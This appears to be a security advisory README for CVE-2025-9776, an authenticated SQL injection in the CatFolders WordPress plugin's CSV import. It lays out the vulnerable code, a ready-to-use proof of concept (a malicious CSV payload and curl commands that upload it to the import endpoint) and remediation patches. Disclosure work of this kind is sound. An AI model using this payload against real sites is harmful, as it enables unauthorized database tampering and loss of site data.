📄 WordPress CatFolders 2.5.2 SQL Injection

# CVE-2025-9776: Authenticated SQL Injection in CatFolders WordPress Plugin
    
    [![CVE](https://img.shields.io/badge/CVE-2025--9776-red)](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-9776)
    [![CVSS Score](https://img.shields.io/badge/CVSS-6.5%20Medium-orange)](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator)
    [![WordPress Plugin](https://img.shields.io/badge/WordPress-Plugin-blue)](https://wordpress.org/plugins/catfolders/)
    [![CWE-89](https://img.shields.io/badge/CWE-89-critical)](https://cwe.mitre.org/data/definitions/89.html)
    [![Wordfence](https://img.shields.io/badge/Disclosed-Wordfence-success)](https://www.wordfence.com/)
    
    > **Keywords:** CVE-2025-9776, CatFolders WordPress vulnerability, SQL injection WordPress, authenticated SQL injection, WordPress security, CSV import vulnerability, WordPress plugin exploit, CWE-89, WordPress database attack, media library vulnerability, WordPress CVE 2025
    
    ## Table of Contents
    
    - [Overview](#overview)
    - [Vulnerability Details](#vulnerability-details)
    - [Technical Analysis](#technical-details)
    - [Proof of Concept](#proof-of-concept)
    - [Remediation Guide](#remediation)
    - [CVSS Metrics](#cvss-v31-metrics)
    - [References](#references)
    - [Security Contact](#contact)
    
    ## Overview
    
    An authenticated SQL Injection vulnerability was discovered in the CatFolders WordPress plugin that allows Author-level users to manipulate database queries through malicious CSV imports.
    
    **Discovered by:** Kai Aizen (SnailSploit)  
    **Published:** 2025  
    **CVSS Score:** 6.5 (Medium)  
    **CWE:** CWE-89 - SQL Injection
    
    ## Vulnerability Details
    
    ### Description
    
    CatFolders – Tame Your WordPress Media Library by Category contains an authenticated SQL Injection vulnerability in the CSV import functionality. The `attachments` column from a user-supplied CSV is split into a list and passed directly to `FolderModel::set_attachments()` which concatenates those values into raw SQL `IN (...)` clauses without proper sanitization or parameterization.
    
    ### Impact
    
    This vulnerability allows authenticated attackers with Author-level privileges to:
    - Execute arbitrary SQL queries
    - Mass deletion or manipulation of folder-attachment mappings
    - Potential data exposure depending on payload and database structure
    - Compromise database integrity and availability
    
    ### Affected Versions
    
    - **Vulnerable:** All versions ≤ 2.5.2
    - **Patched:** Version 2.5.3 and above (verify with vendor)
    
    ### CVSS v3.1 Metrics
    
    ```
    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
    ```
    
    | Metric | Value |
    |--------|-------|
    | Attack Vector | Network (AV:N) |
    | Attack Complexity | Low (AC:L) |
    | Privileges Required | Low (PR:L) - Author+ |
    | User Interaction | None (UI:N) |
    | Scope | Unchanged (S:U) |
    | Confidentiality | None (C:N) |
    | Integrity | Low (I:L) |
    | Availability | Low (A:L) |
    
    ## Technical Details
    
    ### Vulnerable Code Path
    
    The vulnerability exists in the CSV import workflow:
    
    **File:** `includes/Rest/Controllers/ImportController.php`
    
    1. The `import_csv` method parses uploaded CSV without per-field sanitization
    2. `restore_folders()` calls:
    ```php
    FolderModel::set_attachments( 
        $new_folder['id'], 
        explode(',', $folder['attachments']), 
        false 
    );
    ```
    
    **File:** `includes/Models/FolderModel.php`
    
    3. `set_attachments()` builds raw SQL using string concatenation:
    ```php
    'raw' => 'post_id IN (' . $attachmentIds . ')'
    ```
    
    4. Each element is **not** cast to integer nor parameterized, allowing SQL injection
    
    ### Attack Vector
    
    An attacker with Author-level privileges (`upload_files` capability) can inject malicious SQL through the CSV import endpoint:
    
    **Malicious CSV payload:**
    ```csv
    id,name,attachments
    1,Test Folder,"1) OR 1=1--"
    ```
    
    **Resulting vulnerable query:**
    ```sql
    SELECT folder_id FROM wp_catf_folder_posts 
    WHERE post_id IN (1) OR 1=1--)
    ```
    
    This breaks out of the `IN(...)` clause and alters query semantics, potentially affecting all rows.
    
    ### Prerequisites
    
    - Author-level account (or higher) on target WordPress site
    - CatFolders plugin installed and active
    - Access to the REST API import endpoint
    
    ## Proof of Concept
    
    ### Step 1: Discover the REST Namespace
    
    ```bash
    curl -s https://target.site/wp-json | jq -r '.routes | keys[]' | grep '/import-csv$'
    ```
    
    Typical result: `/catf/v1/import-csv`
    
    ### Step 2: Prepare Malicious CSV
    
    Create a file named `catf_inject.csv`:
    
    ```csv
    id,name,attachments
    1,Malicious Folder,"1) OR 1=1--"
    ```
    
    ### Step 3: Execute the Attack
    
    ```bash
    NS="/catf/v1"  # Replace with discovered namespace
    
    curl -i \
      -u 'author_user:APPLICATION_PASSWORD' \
      -F "file=@catf_inject.csv;type=text/csv" \
      -X POST "https://target.site/wp-json${NS}/import-csv"
    ```
    
    **Expected response:**
    ```json
    { "success": true }
    ```
    
    ### Impact Demonstration
    
    The server constructs and executes:
    ```sql
    SELECT folder_id FROM wp_catf_folder_posts WHERE post_id IN (1) OR 1=1--)
    ```
    
    This may perform broader DELETE/INSERT operations than intended, often wiping folder-attachment relationships across the entire database.
    
    ### Safe Testing Environment
    
    Run the standalone SQLite simulation to observe the vulnerability safely:
    
    ```bash
    python3 poc/catfolders_sql_poc.py
    ```
    
    This prints the vulnerable query and demonstrates how a malicious token returns all rows, while a parameterized version properly rejects it.
    
    ## Remediation
    
    ### For Site Administrators
    
    **Immediate Action Required:**
    
    1. Update CatFolders to version **2.5.3** or later
    2. Review user accounts with Author-level or higher privileges
    3. Audit database logs for suspicious queries between affected dates
    4. Check folder-attachment mappings for unexpected modifications
    
    ### For Developers
    
    **Two minimal hardening steps:**
    
    #### 1. Sanitize IDs Before Calling the Model
    
    ```diff
    - FolderModel::set_attachments( $new_folder['id'], explode(',', $folder['attachments']), false );
    + $ids = array_filter( array_map( 'intval', explode(',', $folder['attachments']) ) );
    + if ( ! empty( $ids ) ) {
    +     FolderModel::set_attachments( (int) $new_folder['id'], $ids, false );
    + }
    ```
    
    #### 2. Enforce Integers Inside `set_attachments()`
    
    ```diff
      $imgIds = apply_filters( 'catf_attachment_ids_to_folder', $imgIds );
    + $imgIds = array_values( array_filter( array_map( 'intval', (array) $imgIds ) ) );
    ```
    
    ### Stronger Recommendation
    
    Replace **all** raw SQL concatenation with parameterized queries using WordPress's `$wpdb->prepare()`:
    
    ```php
    $placeholders = implode(',', array_fill(0, count($imgIds), '%d'));
    $query = $wpdb->prepare(
        "SELECT folder_id FROM {$wpdb->prefix}catf_folder_posts WHERE post_id IN ($placeholders)",
        ...$imgIds
    );
    ```
    
    **Additionally:**
    - Validate all CSV fields strictly before processing
    - Implement input type validation at the API layer
    - Add rate limiting to the import endpoint
    - Log all import operations for audit trails
    
    ### Patch File
    
    A complete patch is available in `patch/catfolders_fix.patch`
    
    ## Repository Structure
    
    ```
    CVE-2025-9776/
    ├── README.md                    # This file
    ├── poc/
    │   ├── catf_inject.csv         # Malicious CSV payload
    │   └── catfolders_sql_poc.py   # Safe SQLite simulation
    └── patch/
        └── catfolders_fix.patch    # Recommended fixes
    ```
    
    ## Timeline
    
    - **Discovery Date:** 2025
    - **Vendor Notification:** Coordinated disclosure via Wordfence
    - **Public Disclosure:** 2025
    - **Patch Available:** Version 2.5.3
    
    ## References
    
    - [MITRE CVE Entry](https://www.cve.org/CVERecord?id=CVE-2025-9776)
    - [Wordfence Intelligence Advisory](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/catfolders/catfolders-tame-your-wordpress-media-library-by-category-252-authenticated-author-sql-injection-via-csv-import)
    - [WordPress Plugin Directory](https://wordpress.org/plugins/catfolders/)
    - [SnailSploit Research](https://snailsploit.com)
    
    ## Credits
    
    **Researcher:** Kai Aizen (SnailSploit)
    
    **Disclosure Process:** Coordinated through Wordfence Bug Bounty Program
    
    ## Ethical Considerations
    
    **⚠️ IMPORTANT DISCLAIMER**
    
    This Proof of Concept is provided **exclusively for defensive research and educational purposes**.
    
    ### Usage Guidelines
    
    - ✅ **DO:** Test on your own systems or with explicit written authorization
    - ✅ **DO:** Use for security training and awareness
    - ✅ **DO:** Implement the fixes in your own code
    - ❌ **DO NOT:** Test against systems without permission
    - ❌ **DO NOT:** Use for malicious purposes
    - ❌ **DO NOT:** Exploit in production environments
    
    ### Legal Notice
    
    Unauthorized access to computer systems is illegal under laws including:
    - Computer Fraud and Abuse Act (CFAA) - United States
    - Computer Misuse Act - United Kingdom  
    - Similar legislation in other jurisdictions
    
    **Use at your own risk. The researchers and SnailSploit assume no liability for misuse of this information.**
    
    ## Contact
    
    For questions or additional information about this vulnerability:
    - **Email:** [email protected]
    - **LinkedIn:** [linkedin.com/in/kaiaizen](https://linkedin.com/in/kaiaizen)
    - **Website:** [snailsploit.com](https://snailsploit.com)
    - **Organization:** SnailSploit Security Research
    
    ---
    
    **Stay secure and keep your WordPress installations updated!**
    
    *Last updated: October 13, 2025*
    
    <!-- snailsploit-backlink:start -->
    
    ---
    
    ## 📚 Documentation & Author
    
    This project's full writeup, methodology, and related research lives at:
    
    **[https://snailsploit.com/security-research/cves/cve-2025-9776/](https://snailsploit.com/security-research/cves/cve-2025-9776/)**
    
    Created by **Kai Aizen** — independent offensive security researcher.
    
    [snailsploit.com](https://snailsploit.com) · [Research](https://snailsploit.com/research) · [Frameworks](https://snailsploit.com/frameworks) · [GitHub](https://github.com/SnailSploit) · [LinkedIn](https://linkedin.com/in/kaiaizen) · [ResearchGate](https://www.researchgate.net/profile/Kai-Aizen-2) · [X/Twitter](https://x.com/SnailSploit)
    
    > *Same attack. Different substrate.*
    
    <!-- snailsploit-backlink:end -->